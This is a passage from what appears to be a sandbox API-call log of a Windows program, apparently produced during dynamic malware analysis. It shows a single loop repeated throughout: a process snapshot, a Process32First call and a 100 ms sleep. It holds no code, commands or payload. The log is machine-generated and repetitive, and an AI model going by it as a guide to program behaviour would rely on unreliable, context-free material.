th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.563] Sleep (dwMilliseconds=0x64) [0239.576] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0239.586] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.835] Sleep (dwMilliseconds=0x64) [0239.889] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0239.898] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.038] Sleep (dwMilliseconds=0x64) [0240.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0240.074] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.141] Sleep (dwMilliseconds=0x64) [0240.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0240.194] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.374] Sleep (dwMilliseconds=0x64) [0240.422] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0240.488] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.592] Sleep (dwMilliseconds=0x64) [0240.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0240.618] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.734] Sleep (dwMilliseconds=0x64) [0240.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0240.787] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.943] Sleep (dwMilliseconds=0x64) [0240.986] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0241.000] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.112] Sleep (dwMilliseconds=0x64) [0241.120] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0241.130] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.254] Sleep (dwMilliseconds=0x64) [0241.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0241.418] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.669] Sleep (dwMilliseconds=0x64) [0241.714] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0241.724] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.840] Sleep (dwMilliseconds=0x64) [0241.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0241.958] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.147] Sleep (dwMilliseconds=0x64) [0242.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0242.271] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.502] Sleep (dwMilliseconds=0x64) [0242.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0242.538] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.716] Sleep (dwMilliseconds=0x64) [0242.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0242.780] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.906] Sleep (dwMilliseconds=0x64) [0242.956] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0243.006] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.080] Sleep (dwMilliseconds=0x64) [0243.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0243.102] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.301] Sleep (dwMilliseconds=0x64) [0243.360] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0243.378] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.544] Sleep (dwMilliseconds=0x64) [0243.560] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0243.571] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.899] Sleep (dwMilliseconds=0x64) [0243.967] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0243.984] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.272] Sleep (dwMilliseconds=0x64) [0244.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0244.317] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.473] Sleep (dwMilliseconds=0x64) [0244.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0244.525] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.646] Sleep (dwMilliseconds=0x64) [0244.704] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0244.712] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.825] Sleep (dwMilliseconds=0x64) [0244.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0244.857] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.916] Sleep (dwMilliseconds=0x64) [0244.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0244.946] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.068] Sleep (dwMilliseconds=0x64) [0245.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0245.133] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.374] Sleep (dwMilliseconds=0x64) [0245.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0245.400] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.561] Sleep (dwMilliseconds=0x64) [0245.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0245.617] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.726] Sleep (dwMilliseconds=0x64) [0245.779] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0245.788] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.859] Sleep (dwMilliseconds=0x64) [0245.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0245.879] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.980] Sleep (dwMilliseconds=0x64) [0246.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0246.039] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.157] Sleep (dwMilliseconds=0x64) [0246.202] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0246.212] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.305] Sleep (dwMilliseconds=0x64) [0246.310] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0246.330] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.593] Sleep (dwMilliseconds=0x64) [0246.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0246.763] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.857] Sleep (dwMilliseconds=0x64) [0246.905] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0246.914] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.986] Sleep (dwMilliseconds=0x64) [0247.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0247.085] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.158] Sleep (dwMilliseconds=0x64) [0247.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0247.373] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.489] Sleep (dwMilliseconds=0x64) [0247.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0247.663] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.852] Sleep (dwMilliseconds=0x64) [0247.933] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0247.944] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.100] Sleep (dwMilliseconds=0x64) [0248.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0248.201] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.265] Sleep (dwMilliseconds=0x64) [0248.309] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1884 [0248.318] Process32First (in: hSnapshot=0x1884, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.689] Sleep (dwMilliseconds=0x64) [0248.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0248.961] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.029] Sleep (dwMilliseconds=0x64) [0249.045] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0249.055] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.225] Sleep (dwMilliseconds=0x64) [0249.280] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0249.290] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.423] Sleep (dwMilliseconds=0x64) [0249.436] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0249.445] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.678] Sleep (dwMilliseconds=0x64) [0249.755] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0249.767] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.941] Sleep (dwMilliseconds=0x64) [0250.117] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0250.164] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.235] Sleep (dwMilliseconds=0x64) [0250.248] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0250.257] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.429] Sleep (dwMilliseconds=0x64) [0250.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0250.501] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.627] Sleep (dwMilliseconds=0x64) [0250.675] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0250.687] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.752] Sleep (dwMilliseconds=0x64) [0250.764] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0250.774] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.945] Sleep (dwMilliseconds=0x64) [0251.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0251.029] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.244] Sleep (dwMilliseconds=0x64) [0251.337] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0251.349] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.458] Sleep (dwMilliseconds=0x64) [0251.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0251.522] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.679] Sleep (dwMilliseconds=0x64) [0251.683] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0251.693] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.754] Sleep (dwMilliseconds=0x64) [0251.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0251.775] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.064] Sleep (dwMilliseconds=0x64) [0252.185] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0252.195] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.337] Sleep (dwMilliseconds=0x64) [0252.424] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0252.441] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.617] Sleep (dwMilliseconds=0x64) [0252.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0252.632] Process32First (in: hSnapshot=0x1d14, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.736] Sleep (dwMilliseconds=0x64) [0252.784] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0252.797] Process32First (in: hSnapshot=0x1018, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 